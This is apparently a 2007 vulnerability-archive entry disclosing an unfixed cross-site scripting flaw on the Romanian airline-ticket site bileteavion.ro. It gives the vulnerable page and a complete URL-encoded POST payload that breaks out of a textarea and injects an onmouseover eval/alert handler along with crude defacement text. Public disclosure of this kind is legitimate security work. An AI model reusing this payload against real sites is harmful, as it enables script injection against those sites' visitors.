Security researcher MIster C., has submitted on 06/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.bileteavion.ro, which at the time of submission ranked 140141 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 06/09/2007 |
Date published: 09/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: MIster C. |
Domain: www.bileteavion.ro |
Category: XSS |
Pagerank: 140141 |
URL: http://www.bileteavion.ro/alege-oferta.php |
POST: id_oras_p=0&id_oras_s=0&dus=R&dataP=22-09-2007&dataI=23-09-2007&alegeOrasulP=%3C%2Ftextarea%3E%3Cbr% 3E%3Ccode+onmouseover%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FHacked%2F.source%29%29%3B%3EFucked+By+MIst er+C.MOVE+MOUSE+OVER+THIS+AREA%3C%2Fcode%3E&alegeOrasulS=%3C%2Ftextarea%3E%3Cbr%3E%3Ccode+onmouseove r%3Da%3Deval%3Bb%3Dalert%3Ba%28b%28%2FHacked%2F.source%29%29%3B%3EFucked+By+MIster+C.MOVE+MOUSE+OVER +THIS+AREA%3C%2Fcode%3E&x=44&y=14 |
Click here to view the mirror
|
|
|